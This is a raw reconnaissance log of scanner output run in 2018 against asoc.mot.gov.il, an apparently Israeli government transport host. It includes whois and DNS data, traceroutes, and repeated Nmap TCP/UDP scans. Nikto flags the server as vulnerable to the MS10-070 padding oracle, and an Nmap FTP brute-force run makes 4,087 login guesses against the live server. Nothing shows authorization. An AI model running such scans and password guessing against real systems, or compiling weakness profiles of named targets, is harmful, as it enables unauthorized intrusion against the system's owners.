#######################################################################################################################################
Hostname 	asoc.mot.gov.il  	ISP 	Bezeq International
Continent 	Asia 	  	Flag 	
IL
Country 	Israel 	  	Country Code 	IL
Region 	Central District 	  	Local time 	27 Nov 2018 07:27 IST
City 	Rishon LeZiyyon 	  	Postal Code 	Unknown
IP Address 	212.179.144.251 	  	Latitude 	31.964
  	  	  	Longitude 	34.804
#######################################################################################################################################
> asoc.mot.gov.il 
Server:		38.132.106.139
Address:	38.132.106.139#53

Non-authoritative answer:
Name:	asoc.mot.gov.il
Address: 212.179.144.251
#######################################################################################################################################
HostIP:212.179.144.251
HostName:asoc.mot.gov.il

Gathered Inet-whois information for 212.179.144.251
---------------------------------------------------------------------------------------------------------------------------------------


inetnum:        212.179.144.248 - 212.179.144.255
netname:        OFFICE-OF-TRANSPORTATION-KFAR-SABA
descr:          OFFICE-OF-TRANSPORTATION-KFAR-SABA-LAN
country:        IL
admin-c:        BNT1-RIPE
tech-c:         BHT2-RIPE
status:         ASSIGNED PA
remarks:        please send ABUSE complains to abuse@bezeqint.net
mnt-by:         AS8551-MNT
mnt-lower:      AS8551-MNT
created:        2007-10-03T09:26:13Z
last-modified:  2010-10-12T15:59:04Z
source:         RIPE

role:           BEZEQINT HOSTMASTERS TEAM
address:        Bezeq International
address:        40 hashacham st.
address:        Petach Tikva 49170 Israel
phone:          +972 1 800014014
fax-no:         +972 3 9257674
admin-c:        MR916-RIPE
tech-c:         LBHM-RIPE
tech-c:         HMSB-RIPE
nic-hdl:        BHT2-RIPE
remarks:        Please Send Spam and Abuse ONLY to abuse@bezeqint.net
mnt-by:         AS8551-MNT
created:        2002-10-29T10:01:49Z
last-modified:  2009-02-15T12:35:43Z
source:         RIPE # Filtered

role:           BEZEQINT NETWORKING TEAM
address:        Bezeq International
address:        40 hashacham st.
address:        Petach Tikva 49170 Israel
phone:          +972 1 800014014
fax-no:         +972 3 9257674
admin-c:        MR916-RIPE
tech-c:         MR916-RIPE
tech-c:         RD1278-RIPE
nic-hdl:        BNT1-RIPE
remarks:        Please Send Spam and Abuse ONLY to abuse@bezeqint.net
mnt-by:         AS8551-MNT
mnt-by:         AS12400-MNT
created:        2005-09-27T12:31:29Z
last-modified:  2018-10-22T06:19:45Z
source:         RIPE # Filtered

% Information related to '212.179.128.0/19AS8551'

route:          212.179.128.0/19
descr:          BEZEQ-INTERNATIONAL
origin:         AS8551
mnt-by:         AS8551-MNT
created:        2002-09-18T12:33:22Z
last-modified:  2004-10-31T12:55:04Z
source:         RIPE # Filtered

% This query was served by the RIPE Database Query Service version 1.92.6 (BLAARKOP)



Gathered Inic-whois information for asoc.mot.gov.il
---------------------------------------------------------------------------------------------------------------------------------------
ERROR: Unable to locate Name Whois data on asoc.mot.gov.il

Gathered Netcraft information for asoc.mot.gov.il
--------------------------------------------------------------------------------------------------------------------------------------

Retrieving Netcraft.com information for asoc.mot.gov.il
Netcraft.com Information gathered

Gathered Subdomain information for asoc.mot.gov.il
--------------------------------------------------------------------------------------------------------------------------------------
Searching Google.com:80...
Searching Altavista.com:80...
Found 0 possible subdomain(s) for host asoc.mot.gov.il, Searched 0 pages containing 0 results

Gathered E-Mail information for asoc.mot.gov.il
---------------------------------------------------------------------------------------------------------------------------------------
Searching Google.com:80...
Searching Altavista.com:80...
Found 0 E-Mail(s) for host asoc.mot.gov.il, Searched 0 pages containing 0 results

Gathered TCP Port information for 212.179.144.251
---------------------------------------------------------------------------------------------------------------------------------------

 Port		State

21/tcp		open
80/tcp		open

Portscan Finished: Scanned 150 ports, 2 ports were in state closed


#######################################################################################################################################
[i] Scanning Site: http://asoc.mot.gov.il 



B A S I C   I N F O 
=======================================================================================================================================


[+] Site Title: 
	Security Code System

[+] IP address: 212.179.144.251
[+] Web Server: Could Not Detect
[+] CMS: Could Not Detect 
[+] Cloudflare: Not Detected
[+] Robots File: Could NOT Find robots.txt! 




W H O I S   L O O K U P
=======================================================================================================================================

	
% The data in the WHOIS database of the .il registry is provided
% by ISOC-IL for information purposes, and to assist persons in 
% obtaining information about or related to a domain name 
% registration record. ISOC-IL does not guarantee its accuracy.
% By submitting a WHOIS query, you agree that you will use this
% Data only for lawful purposes and that, under no circumstances
% will you use this Data to: (1) allow, enable, or otherwise 
% support the transmission of mass unsolicited, commercial 
% advertising or solicitations via e-mail (spam); 
% or  (2) enable high volume, automated, electronic processes that 
% apply to ISOC-IL (or its systems).
% ISOC-IL reserves the right to modify these terms at any time.
% By submitting this query, you agree to abide by this policy.
 
% No data was found to match the request criteria.


% Rights to the data above are restricted by copyright.




G E O  I P  L O O K  U P
=======================================================================================================================================

[i] IP Address: 212.179.144.251 
[i] Country: IL 
[i] State: N/A 
[i] City: N/A 
[i] Latitude: 31.500000 
[i] Longitude: 34.750000 




H T T P   H E A D E R S
=======================================================================================================================================


[i]  HTTP/1.1 200 OK
[i]  Date: Tue, 27 Nov 2018 05:36:42 GMT
[i]  X-Powered-By: ASP.NET
[i]  X-AspNet-Version: 2.0.50727
[i]  Set-Cookie: ASP.NET_SessionId=xzbuafng2r3dm24550fck42x; path=/; HttpOnly
[i]  Cache-Control: private
[i]  Content-Type: text/html; charset=utf-8
[i]  Content-Length: 15647
[i]  Connection: close




D N S   L O O K U P
=======================================================================================================================================

asoc.mot.gov.il.	599	IN	A	212.179.144.251




S U B N E T   C A L C U L A T I O N
=======================================================================================================================================

Address       = 212.179.144.251
Network       = 212.179.144.251 / 32
Netmask       = 255.255.255.255
Broadcast     = not needed on Point-to-Point links
Wildcard Mask = 0.0.0.0
Hosts Bits    = 0
Max. Hosts    = 1   (2^0 - 0)
Host Range    = { 212.179.144.251 - 212.179.144.251 }



N M A P   P O R T   S C A N
=======================================================================================================================================


Starting Nmap 7.40 ( https://nmap.org ) at 2018-11-27 05:36 UTC
Nmap scan report for asoc.mot.gov.il (212.179.144.251)
Host is up (0.15s latency).
rDNS record for 212.179.144.251: bzq-179-144-251.pop.bezeqint.net
PORT     STATE    SERVICE
21/tcp   open     ftp
22/tcp   filtered ssh
23/tcp   filtered telnet
80/tcp   open     http
110/tcp  filtered pop3
143/tcp  filtered imap
443/tcp  closed   https
3389/tcp filtered ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 3.80 seconds

#######################################################################################################################################

[?] Enter the target: http://asoc.mot.gov.il/
[!] IP Address : 212.179.144.251
[+] Operating System : Windows
[!] asoc.mot.gov.il doesn't seem to use a CMS
[+] Honeypot Probabilty: 0%
---------------------------------------------------------------------------------------------------------------------------------------
[~] Trying to gather whois information for asoc.mot.gov.il
[+] Whois information found
[-] Unable to build response, visit https://who.is/whois/asoc.mot.gov.il 
---------------------------------------------------------------------------------------------------------------------------------------
PORT     STATE    SERVICE
21/tcp   open     ftp
22/tcp   filtered ssh
23/tcp   filtered telnet
80/tcp   open     http
110/tcp  filtered pop3
143/tcp  filtered imap
443/tcp  closed   https
3389/tcp filtered ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 2.09 seconds
---------------------------------------------------------------------------------------------------------------------------------------
#######################################################################################################################################
; <<>> DiG 9.11.5-1-Debian <<>> asoc.mot.gov.il
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 52778
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;asoc.mot.gov.il.		IN	A

;; ANSWER SECTION:
asoc.mot.gov.il.	600	IN	A	212.179.144.251

;; Query time: 194 msec
;; SERVER: 38.132.106.139#53(38.132.106.139)
;; WHEN: mar nov 27 01:16:51 EST 2018
;; MSG SIZE  rcvd: 60
#######################################################################################################################################
; <<>> DiG 9.11.5-1-Debian <<>> +trace asoc.mot.gov.il
;; global options: +cmd
.			83581	IN	NS	c.root-servers.net.
.			83581	IN	NS	m.root-servers.net.
.			83581	IN	NS	i.root-servers.net.
.			83581	IN	NS	d.root-servers.net.
.			83581	IN	NS	e.root-servers.net.
.			83581	IN	NS	h.root-servers.net.
.			83581	IN	NS	a.root-servers.net.
.			83581	IN	NS	l.root-servers.net.
.			83581	IN	NS	j.root-servers.net.
.			83581	IN	NS	f.root-servers.net.
.			83581	IN	NS	k.root-servers.net.
.			83581	IN	NS	b.root-servers.net.
.			83581	IN	NS	g.root-servers.net.
.			83581	IN	RRSIG	NS 8 0 518400 20181209170000 20181126160000 2134 . p7Gi43su+I4soIIYXHU0eyoJ4tuQlNN5gCuXcfuZhcdZ5LFcs5NKBg2n CiCFPwN1DkQEGciMFcY7SNrE1+B9Q6KFwFAazkPhf8X4KflWwM8fBfRv s6+PhOHSuQ+BkdPBziNUN3fG1bQkgbFv/lfOjS/O57LXx49+k7iHtP0p MWOGUu8rP0u9Ds/e4UoVJpWyJWnqTBwfQrle8XHjn9+/RmnCAnim3aa/ SJLIJA4PSdLGstwaog+KS2QsGs15QHjMqaHbTh0Skv3cqhnMy8xvhxWk 9ZsS9hxHIUcR54l/as2RJuBMSJSoo+nIcrUfX7s+SiJswJEu6VvVskel NxCmgg==
;; Received 525 bytes from 38.132.106.139#53(38.132.106.139) in 54 ms

il.			172800	IN	NS	nse.ns.il.
il.			172800	IN	NS	nsb.ns.il.
il.			172800	IN	NS	lookup.iucc.ac.il.
il.			172800	IN	NS	ns2.ns.il.
il.			172800	IN	NS	ilns.ilan.net.il.
il.			172800	IN	NS	nsa.ns.il.
il.			172800	IN	NS	sns-pb.isc.org.
il.			172800	IN	NS	ns1.ns.il.
il.			172800	IN	NS	ns3.ns.il.
il.			86400	IN	DS	44729 8 2 7FA5A2FD091C340D4A01864B4F82D66D0769F3D3A0A1C48F8ABD2A64 B1689921
il.			86400	IN	RRSIG	DS 8 1 86400 20181210050000 20181127040000 2134 . n7K6WR9NGTGDr2TfAYjfJtp+SxPOTk2saN9VDdlXAaS7Ji6IdVAYytuH d0tam/Tmv0flzI3hWJOFpuhacwcGema79NLI5n3ymqZAqyp3zVT8fepx Dekpspnt4TMceCyttYvV5BViYqmu6Ko2TlQicJaoCllNNyrTvHjqCkcm eQgK7sT51pGMuyOsoDLXl+ElbFLLALRNZwri9IXY+JPEYYlLdIuqreZ1 8f/44RmULOy7hJwDQPbeCnfrH6PKF/an7U7D3FDgqKsi6XDq81iC0u5+ DEB3GjDCWaR66B/YgTSqGG46G38gx4HJxNkDcWLg0m+sVwZq65T+Ni7e zyzTaQ==
;; Received 859 bytes from 192.33.4.12#53(c.root-servers.net) in 49 ms

asoc.mot.gov.il.	600	IN	A	212.179.144.251
gov.il.			600	IN	NS	ns2.ns.il.
gov.il.			600	IN	NS	ns1.ns.il.
gov.il.			600	IN	NS	nsa.ns.il.
gov.il.			600	IN	NS	ilns.ilan.net.il.
gov.il.			600	IN	NS	dns3.gov.il.
gov.il.			600	IN	NS	sns-pb.isc.org.
gov.il.			600	IN	NS	ns3.ns.il.
gov.il.			600	IN	NS	nse.ns.il.
gov.il.			600	IN	NS	lookup.iucc.ac.il.
gov.il.			600	IN	NS	nsb.ns.il.
;; Received 3081 bytes from 2001:67c:1010:31::53#53(ns1.ns.il) in 52 ms
#######################################################################################################################################
Start: 2018-11-27T06:21:27+0000
HOST: web01                                      Loss%   Snt   Last   Avg  Best  Wrst StDev
  1.|-- 45.79.12.201                                0.0%     3    1.0   1.0   0.9   1.1   0.1
  2.|-- 45.79.12.0                                  0.0%     3    0.6   0.9   0.6   1.1   0.3
  3.|-- ix-et-5-1-2-0.tcore1.dt8-dallas.as6453.net  0.0%     3    1.7   1.3   1.2   1.7   0.3
  4.|-- if-ae-37-3.tcore1.aeq-ashburn.as6453.net    0.0%     3  119.1 119.3 119.1 119.4   0.2
  5.|-- if-ae-2-2.tcore2.aeq-ashburn.as6453.net     0.0%     3  119.1 119.0 118.7 119.1   0.2
  6.|-- if-ae-12-2.tcore4.njy-newark.as6453.net     0.0%     3  115.7 116.0 115.7 116.3   0.3
  7.|-- if-ae-1-3.tcore3.njy-newark.as6453.net      0.0%     3  119.1 119.0 118.9 119.1   0.1
  8.|-- if-ae-15-2.tcore1.l78-london.as6453.net     0.0%     3  119.2 118.0 115.9 119.2   1.8
  9.|-- if-ae-2-2.tcore2.l78-london.as6453.net      0.0%     3  115.7 116.1 115.7 116.5   0.4
 10.|-- if-ae-14-2.tcore2.av2-amsterdam.as6453.net  0.0%     3  119.4 120.2 118.6 122.7   2.2
 11.|-- if-ae-2-2.tcore1.av2-amsterdam.as6453.net   0.0%     3  119.1 119.4 119.0 119.9   0.5
 12.|-- if-ae-6-2.tcore1.fnm-frankfurt.as6453.net   0.0%     3  116.0 116.2 116.0 116.5   0.3
 13.|-- if-ae-7-2.tcore1.fr0-frankfurt.as6453.net   0.0%     3  116.0 116.1 115.9 116.4   0.3
 14.|-- 195.219.50.30                               0.0%     3  122.5 122.7 122.5 123.1   0.3
 15.|-- bzq-161-217.pop.bezeqint.net                0.0%     3  179.3 182.1 173.8 193.4  10.1
 16.|-- bzq-179-124-125.cust.bezeqint.net           0.0%     3  179.0 179.0 179.0 179.1   0.1
 17.|-- bzq-179-162-70.pop.bezeqint.net             0.0%     3  173.4 173.6 173.4 173.8   0.2
 18.|-- bzq-179-144-251.pop.bezeqint.net            0.0%     3  178.8 178.8 178.7 178.8   0.1

#######################################################################################################################################
[*] Processing domain asoc.mot.gov.il
[+] Getting nameservers
[-] Getting nameservers failed
[-] Zone transfer failed

[*] Scanning asoc.mot.gov.il for A records
212.179.144.251 - asoc.mot.gov.il 
[*] Performing General Enumeration of Domain: asoc.mot.gov.il
[-] DNSSEC is not configured for asoc.mot.gov.il
[*] 	 SOA dns.gov.il 147.237.71.1
[-] Could not Resolve NS Records for asoc.mot.gov.il
[-] Could not Resolve MX Records for asoc.mot.gov.il
[*] 	 A asoc.mot.gov.il 212.179.144.251
[*] Enumerating SRV Records
[-] No SRV Records Found for asoc.mot.gov.il
[+] 0 Records Found
#######################################################################################################################################
---------------------------------------------------------------------------------------------------------------------------------------
+ Target IP:          212.179.144.251
+ Target Hostname:    asoc.mot.gov.il
+ Target Port:        80
+ Start Time:         2018-11-27 00:34:39 (GMT-5)
---------------------------------------------------------------------------------------------------------------------------------------
+ Server: No banner retrieved
+ Retrieved x-aspnet-version header: 2.0.50727
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-68127: Server is vulnerable to http://www.microsoft.com/technet/security/bulletin/MS10-070.asp allowing a cryptographic padding oracle.
+ Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_URL 0
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD 
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated:  19 error(s) and 9 item(s) reported on remote host
+ End Time:           2018-11-27 00:56:29 (GMT-5) (1310 seconds)
---------------------------------------------------------------------------------------------------------------------------------------
######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-27 00:35 EST
Nmap scan report for 212.179.144.251
Host is up (0.061s latency).
Not shown: 470 filtered ports, 4 closed ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-27 00:35 EST
Nmap scan report for 212.179.144.251
Host is up (0.035s latency).
Not shown: 2 filtered ports
PORT     STATE         SERVICE
53/udp   open|filtered domain
67/udp   open|filtered dhcps
68/udp   open|filtered dhcpc
69/udp   open|filtered tftp
88/udp   open|filtered kerberos-sec
123/udp  open|filtered ntp
139/udp  open|filtered netbios-ssn
161/udp  open|filtered snmp
162/udp  open|filtered snmptrap
389/udp  open|filtered ldap
520/udp  open|filtered route
2049/udp open|filtered nfs
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-27 00:36 EST
Nmap scan report for 212.179.144.251
Host is up (0.19s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-brute: 
|   Accounts: No valid accounts found
|_  Statistics: Performed 4087 guesses in 180 seconds, average tps: 22.5
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|WAP
Running (JUST GUESSING): Microsoft Windows 2003|XP (89%), Apple embedded (85%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_xp::sp3 cpe:/h:apple:airport_extreme
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 (89%), Microsoft Windows Server 2003 SP2 (89%), Microsoft Windows XP SP3 or Windows Server 2003 SP2 (89%), Microsoft Windows 2003 (88%), Microsoft Windows Server 2003 SP1 or SP2 (88%), Apple AirPort Extreme WAP (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 14 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   35.02 ms  10.251.200.1
2   35.26 ms  184.75.211.209
3   35.82 ms  104.245.147.41
4   35.26 ms  he.ip4.torontointernetxchange.net (206.108.34.112)
5   46.05 ms  100ge11-2.core1.nyc5.he.net (184.105.81.53)
6   105.75 ms 184.105.65.246
7   109.76 ms 100ge3-2.core1.man1.he.net (72.52.92.197)
8   122.11 ms 100ge16-1.core1.ams1.he.net (184.105.213.65)
9   132.37 ms 80.249.209.46
10  181.41 ms 212.179.161.217
11  188.54 ms 62.219.189.2
12  180.26 ms bzq-179-162-58.pop.bezeqint.net (212.179.162.58)
13  183.08 ms bzq-179-162-58.pop.bezeqint.net (212.179.162.58)
14  185.67 ms 212.179.144.251
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-27 00:39 EST
Nmap scan report for 212.179.144.251
Host is up (0.20s latency).

PORT   STATE         SERVICE VERSION
67/udp open|filtered dhcps
|_dhcp-discover: ERROR: Script execution failed (use -d to debug)
Too many fingerprints match this host to give specific OS details
Network Distance: 15 hops

TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   34.27 ms  10.251.200.1
2   34.30 ms  184.75.211.209
3   34.32 ms  104.245.147.41
4   34.33 ms  he.ip4.torontointernetxchange.net (206.108.34.112)
5   45.70 ms  100ge11-2.core1.nyc5.he.net (184.105.81.53)
6   109.70 ms 184.105.65.246
7   111.25 ms 72.52.92.197
8   117.48 ms 100ge16-1.core1.ams1.he.net (184.105.213.65)
9   131.74 ms 80.249.209.46
10  ...
11  132.66 ms bzq-179-54-109.cust.bezeqint.net (212.179.54.109)
12  182.05 ms 62.219.189.125
13  185.48 ms 62.219.189.2
14  180.43 ms bzq-162-70.pop.bezeqint.net (212.179.162.70)
15  183.51 ms bzq-179-144-251.pop.bezeqint.net (212.179.144.251)
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-27 00:42 EST
Nmap scan report for 212.179.144.251
Host is up (0.18s latency).

PORT   STATE         SERVICE VERSION
68/udp open|filtered dhcpc
Too many fingerprints match this host to give specific OS details
Network Distance: 15 hops

TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   34.76 ms  10.251.200.1
2   34.83 ms  184.75.211.209
3   34.88 ms  104.245.147.41
4   34.87 ms  he.ip4.torontointernetxchange.net (206.108.34.112)
5   45.73 ms  100ge11-2.core1.nyc5.he.net (184.105.81.53)
6   105.58 ms 184.105.65.246
7   109.60 ms 72.52.92.197
8   118.15 ms 100ge16-1.core1.ams1.he.net (184.105.213.65)
9   132.39 ms 80.249.209.46
10  ...
11  131.39 ms bzq-179-54-109.cust.bezeqint.net (212.179.54.109)
12  181.59 ms 62.219.189.125
13  181.62 ms 62.219.189.2
14  180.53 ms bzq-162-70.pop.bezeqint.net (212.179.162.70)
15  181.98 ms bzq-179-144-251.pop.bezeqint.net (212.179.144.251)
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-27 00:44 EST
Nmap scan report for 212.179.144.251
Host is up (0.18s latency).

PORT   STATE         SERVICE VERSION
69/udp open|filtered tftp
Too many fingerprints match this host to give specific OS details
Network Distance: 15 hops

TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   34.98 ms  10.251.200.1
2   35.34 ms  184.75.211.209
3   35.41 ms  104.245.147.41
4   35.40 ms  he.ip4.torontointernetxchange.net (206.108.34.112)
5   47.04 ms  100ge11-2.core1.nyc5.he.net (184.105.81.53)
6   106.00 ms 184.105.65.246
7   109.82 ms 72.52.92.197
8   118.66 ms 100ge16-1.core1.ams1.he.net (184.105.213.65)
9   132.68 ms 80.249.209.46
10  ...
11  131.85 ms bzq-179-54-109.cust.bezeqint.net (212.179.54.109)
12  180.92 ms 62.219.189.125
13  180.95 ms 62.219.189.2
14  179.27 ms bzq-162-70.pop.bezeqint.net (212.179.162.70)
15  184.38 ms bzq-179-144-251.pop.bezeqint.net (212.179.144.251)
#######################################################################################################################################

                                 ^     ^
        _   __  _   ____ _   __  _    _   ____
       ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
      | V V // o // _/ | V V // 0 // 0 // _/
      |_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/
                                <
                                ...'

    WAFW00F - Web Application Firewall Detection Tool

    By Sandro Gauci && Wendel G. Henrique

Checking http://212.179.144.251
The site http://212.179.144.251 is behind a ModSecurity (OWASP CRS)
Number of requests: 11
#######################################################################################################################################
http://212.179.144.251 [200 OK] ASP_NET[2.0.50727], Cookies[ASP.NET_SessionId], Country[ISRAEL][IL], HttpOnly[ASP.NET_SessionId], IP[212.179.144.251], PasswordField[ctl00$MenuHeader$AWUCLogin1$password], Script[JavaScript,javascript,text/javascript], Title[Security Code System][Title element contains newline(s)!], X-Powered-By[ASP.NET]
#######################################################################################################################################

wig - WebApp Information Gatherer


Scanning http://212.179.144.251...
___________________________ SITE INFO ___________________________
IP                    Title                                      
212.179.144.251       Security Code System                     
                                                                 
____________________________ VERSION ____________________________
Name                  Versions                Type               
ASP.NET               2.0.50727.42            Platform           
                                                                 
__________________________ INTERESTING __________________________
URL                   Note                    Type               
/_layouts/none.aspx   ASP.NET detailed error  Interesting        
                                                                 
_____________________ PLATFORM OBSERVATIONS _____________________
Platform              URL                     Type               
ASP.NET 2.0.50727                             Observation        
ASP.NET 2.0.50727.42  /_layouts/none.aspx     Observation        
                                                                 
_________________________________________________________________
Time: 35.7 sec        Urls: 620               Fingerprints: 40401
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-27 00:48 EST
Nmap scan report for 212.179.144.251
Host is up (0.19s latency).

PORT    STATE         SERVICE VERSION
123/udp open|filtered ntp
Too many fingerprints match this host to give specific OS details
Network Distance: 13 hops

TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   36.15 ms  10.251.200.1
2   36.19 ms  184.75.211.209
3   36.21 ms  104.245.147.41
4   36.22 ms  he.ip4.torontointernetxchange.net (206.108.34.112)
5   47.61 ms  100ge11-2.core1.nyc5.he.net (184.105.81.53)
6   107.04 ms 184.105.65.246
7   110.85 ms 100ge3-2.core1.man1.he.net (72.52.92.197)
8   119.83 ms 100ge16-1.core1.ams1.he.net (184.105.213.65)
9   133.24 ms 80.249.209.46
10  184.54 ms 212.179.161.217
11  208.25 ms 62.219.189.22
12  182.33 ms bzq-162-70.pop.bezeqint.net (212.179.162.70)
13  184.92 ms 212.179.144.251
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-27 00:50 EST
Nmap scan report for 212.179.144.251
Host is up (0.053s latency).

PORT    STATE         SERVICE VERSION
161/tcp filtered      snmp
161/udp open|filtered snmp
Too many fingerprints match this host to give specific OS details
Network Distance: 13 hops

TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   38.51 ms  10.251.200.1
2   38.73 ms  184.75.211.209
3   38.76 ms  104.245.147.41
4   55.71 ms  he.ip4.torontointernetxchange.net (206.108.34.112)
5   49.72 ms  100ge11-2.core1.nyc5.he.net (184.105.81.53)
6   109.75 ms 184.105.65.246
7   113.72 ms 100ge3-2.core1.man1.he.net (72.52.92.197)
8   134.37 ms 100ge16-1.core1.ams1.he.net (184.105.213.65)
9   136.83 ms 80.249.209.46
10  187.63 ms 212.179.161.217
11  182.29 ms 62.219.189.22
12  181.41 ms bzq-162-70.pop.bezeqint.net (212.179.162.70)
13  184.55 ms 212.179.144.251
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-27 00:55 EST
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 00:55
Completed NSE at 00:55, 0.00s elapsed
Initiating NSE at 00:55
Completed NSE at 00:55, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 00:55
Completed Parallel DNS resolution of 1 host. at 00:55, 16.50s elapsed
Initiating SYN Stealth Scan at 00:55
Scanning 212.179.144.251 [474 ports]
Discovered open port 80/tcp on 212.179.144.251
Discovered open port 21/tcp on 212.179.144.251
Completed SYN Stealth Scan at 00:55, 6.01s elapsed (474 total ports)
Initiating Service scan at 00:55
Scanning 2 services on 212.179.144.251
Completed Service scan at 00:55, 6.42s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 212.179.144.251
Retrying OS detection (try #2) against 212.179.144.251
Initiating Traceroute at 00:55
Completed Traceroute at 00:55, 0.05s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 00:55
Completed Parallel DNS resolution of 2 hosts. at 00:56, 16.50s elapsed
NSE: Script scanning 212.179.144.251.
Initiating NSE at 00:56
Completed NSE at 00:57, 57.36s elapsed
Initiating NSE at 00:57
Completed NSE at 00:57, 0.00s elapsed
Nmap scan report for 212.179.144.251
Host is up (0.048s latency).
Not shown: 468 filtered ports
PORT    STATE  SERVICE      VERSION
21/tcp  open   ftp          Microsoft ftpd
25/tcp  closed smtp
80/tcp  open   http         Microsoft IIS httpd
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: Security Code System
139/tcp closed netbios-ssn
443/tcp closed https
445/tcp closed microsoft-ds
Device type: WAP|broadband router|general purpose
Running (JUST GUESSING): Linux 2.6.X (91%), Asus embedded (87%), Netgear embedded (87%), DEC Digital UNIX 4.X (86%)
OS CPE: cpe:/o:linux:linux_kernel:2.6.22 cpe:/h:asus:rt-ac66u cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:2.6.11 cpe:/h:asus:rt-n16 cpe:/h:netgear:wnr834bv2 cpe:/o:dec:digital_unix:4
Aggressive OS guesses: Tomato firmware (Linux 2.6.22) (91%), Asus RT-AC66U router (Linux 2.6) (87%), Linux 2.6.11 (87%), Asus RT-N16 WAP (Linux 2.6) (87%), Asus RT-N66U WAP (Linux 2.6) (87%), Tomato 1.28 (Linux 2.6.22) (87%), Netgear WNR834Bv2 WAP (87%), Linux 2.6.26 (87%), Linux 2.6.32 (86%), DEC Digital UNIX OSF1 v4.0 1229 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 445/tcp)
HOP RTT      ADDRESS
1   36.26 ms 10.251.200.1
2   36.24 ms 212.179.144.251

NSE: Script Post-scanning.
Initiating NSE at 00:57
Completed NSE at 00:57, 0.00s elapsed
Initiating NSE at 00:57
Completed NSE at 00:57, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 116.16 seconds
           Raw packets sent: 1089 (53.394KB) | Rcvd: 3958 (317.809KB)
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-27 00:57 EST
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 00:57
Completed NSE at 00:57, 0.00s elapsed
Initiating NSE at 00:57
Completed NSE at 00:57, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 00:57
Completed Parallel DNS resolution of 1 host. at 00:57, 16.50s elapsed
Initiating UDP Scan at 00:57
Scanning 212.179.144.251 [14 ports]
Completed UDP Scan at 00:57, 1.36s elapsed (14 total ports)
Initiating Service scan at 00:57
Scanning 12 services on 212.179.144.251
Service scan Timing: About 8.33% done; ETC: 01:17 (0:17:58 remaining)
Completed Service scan at 00:59, 102.59s elapsed (12 services on 1 host)
Initiating OS detection (try #1) against 212.179.144.251
Retrying OS detection (try #2) against 212.179.144.251
Initiating Traceroute at 00:59
Completed Traceroute at 00:59, 7.11s elapsed
Initiating Parallel DNS resolution of 1 host. at 00:59
Completed Parallel DNS resolution of 1 host. at 00:59, 16.51s elapsed
NSE: Script scanning 212.179.144.251.
Initiating NSE at 00:59
Completed NSE at 00:59, 20.31s elapsed
Initiating NSE at 00:59
Completed NSE at 00:59, 1.03s elapsed
Nmap scan report for 212.179.144.251
Host is up (0.035s latency).

PORT     STATE         SERVICE      VERSION
53/udp   open|filtered domain
67/udp   open|filtered dhcps
68/udp   open|filtered dhcpc
69/udp   open|filtered tftp
88/udp   open|filtered kerberos-sec
123/udp  open|filtered ntp
137/udp  filtered      netbios-ns
138/udp  filtered      netbios-dgm
139/udp  open|filtered netbios-ssn
161/udp  open|filtered snmp
162/udp  open|filtered snmptrap
389/udp  open|filtered ldap
520/udp  open|filtered route
2049/udp open|filtered nfs
Too many fingerprints match this host to give specific OS details

TRACEROUTE (using port 137/udp)
